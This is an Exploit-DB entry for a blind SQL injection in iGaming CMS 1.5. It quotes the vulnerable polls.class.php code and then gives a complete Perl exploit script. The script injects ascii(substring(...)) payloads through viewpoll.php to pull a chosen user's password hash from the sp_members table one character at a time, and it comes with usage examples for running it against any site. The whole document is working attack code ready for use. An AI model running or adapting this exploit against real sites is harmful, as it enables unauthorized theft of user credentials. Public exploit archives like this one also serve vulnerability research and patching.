iGaming CMS 1.5 - Blind SQL Injection

EDB-ID:

15177

CVE:

N/A


Author:

plucky

Type:

webapps


Platform:

PHP

Date:

2010-10-01


#!/usr/bin/env perl

=pod
iGaming CMS <= 1.5 Blind SQL Injection

Author: plucky
Email: io.plucky@gmail.com
Web Site: http://plucky.heliohost.org
Crew : WarWolfZ

Usage:   perl exploit.pl <website> <user_id>
Example: perl exploit.pl http://website.net/iGamingCMS1.5/ 1

Vulnerability: polls.class.php
[line 10-17]

if (!empty($_REQUEST['id']))
{
  $poll = $db->Execute("
                        SELECT id,title
                        FROM `sp_polls`
                        WHERE `id` = '" . $_REQUEST['id'] . "'");

$result = $db->Execute("SELECT * FROM sp_polls_options WHERE poll_id = '$_REQUEST[id]' ORDER BY id"); 

THX TO: shrod and warwolfz crew
=cut

use strict;
use warnings;
use LWP::Simple;

my $password               = '';
my $vulnerable_page        = '';

my $target_id              =  1;

sub header_exploit {
   
   print 'iGaming CMS <= 1.5 Blind SQL Injection'    . "\n".
         '-----------------------------------------' . "\n".
         'Author:  plucky'                           . "\n".
         'Email:   io.plucky@gmail.com'              . "\n".
         '-----------------------------------------' . "\n".
         '[!]Target id: '.$target_id                 . "\n".
         '[!]Exploit Status: Working...'             . "\n";
}

sub usage_exploit {

   print 'Usage:'                                                    . "\n".
         '      perl exploit.pl http://[site]/[path]/ [id]'          . "\n".
         'Examples:'                                                 . "\n".
         '         perl' . $0 . 'http://web_site/cms/ 1'             . "\n".
         '         perl' . $0 . 'http://games_site/iGamingCMS1.5/ 1' . "\n";

exit;
}

sub run_exploit {
   
   my $parameter_id           = shift;
   my $parameter_page         = shift;

   my $target_id              = $$parameter_id;
   my $vulnerable_page        = $$parameter_page;

   my $character_id           =  1;

   my $HTML_source            = '';
   my $SQL_Injection          = '';
   my $hexadecimal_character  = '';
   my $result                 = '';
   my $table                  = 'sp_members';

   my @hexadecimal_characters = ( 48..57, 97..102 );


   foreach $character_id ( 1..32 ) {
       
   character_research:
          foreach $hexadecimal_character ( @hexadecimal_characters ) {

                 $SQL_Injection  = "viewpoll.php?id=' or ascii(substring((select pass from $table where id=$target_id),$character_id,1))=$hexadecimal_character\%23"; 
                 $HTML_source = get( $vulnerable_page.$SQL_Injection );

                 if ( $HTML_source !~ /Error/i ) {

                   $result .= chr($hexadecimal_character);
                   $character_id++;

                   last character_research;
       }
     }
   }
   
   return $result;
}

$vulnerable_page = $ARGV[0] || usage_exploit;
$target_id       = $ARGV[1] || usage_exploit;

header_exploit;
$password = run_exploit ( \$target_id, \$vulnerable_page );

print '[!]Password: ', $password, "\n";